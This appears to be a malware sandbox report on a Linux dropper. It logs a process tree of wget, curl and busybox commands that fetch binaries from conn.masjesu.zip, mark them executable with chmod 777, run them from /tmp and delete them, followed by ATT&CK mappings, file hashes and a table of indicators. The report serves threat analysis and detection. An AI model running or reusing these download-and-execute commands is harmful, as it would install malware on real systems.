/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- System Network Configuration Discovery
PID:971

/bin/chmod
chmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- File and Directory Permissions Modification
PID:972

/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- Executes dropped EXE
PID:973

/bin/rm
rm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
PID:975

/usr/bin/wget
wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- System Network Configuration Discovery
PID:976

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- System Network Configuration Discovery
PID:979

/bin/chmod
chmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- File and Directory Permissions Modification
PID:980

/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- Executes dropped EXE
PID:981

/bin/rm
rm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
PID:983

/usr/bin/wget
wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- System Network Configuration Discovery
PID:984

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- System Network Configuration Discovery
PID:987

/bin/chmod
chmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- File and Directory Permissions Modification
PID:988

/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
./200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- Executes dropped EXE
PID:989

/bin/rm
rm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
PID:990

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- System Network Configuration Discovery
PID:991

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- System Network Configuration Discovery
PID:994

/bin/chmod
chmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- File and Directory Permissions Modification
PID:995

/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- Executes dropped EXE
PID:996

/bin/rm
rm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
PID:998

/usr/bin/wget
wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
PID:999

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1000

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
PID:1002

/bin/chmod
chmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- File and Directory Permissions Modification
PID:1003

/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- Executes dropped EXE
PID:1004

/bin/rm
rm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
PID:1005

/usr/bin/wget
wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- System Network Configuration Discovery
PID:1006

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1007

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i

Filesize
16B

MD5
7689ca8c5bc85cf6b78ef89323d4df6a

SHA1
a1392ec3b571b3de167f0b9a5dadab4f14a2db76

SHA256
17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5

SHA512
40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

Download Submit
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc	739	xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i	746	ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X	771	YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK	797	x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m	816	qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb	824	200cUyejdGjWDM9heC9D1Qq26iolWznBRb
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2	831	Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX	869	8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA	877	alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz	884	iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp	891	O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz	898	Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1	906	hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd	914	3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp	921	O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz	928	Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1	935	hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd	943	3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc	950	xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i	958	ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X	965	YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK	973	x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m	981	qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb	989	200cUyejdGjWDM9heC9D1Qq26iolWznBRb
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2	996	Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX	1004	8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads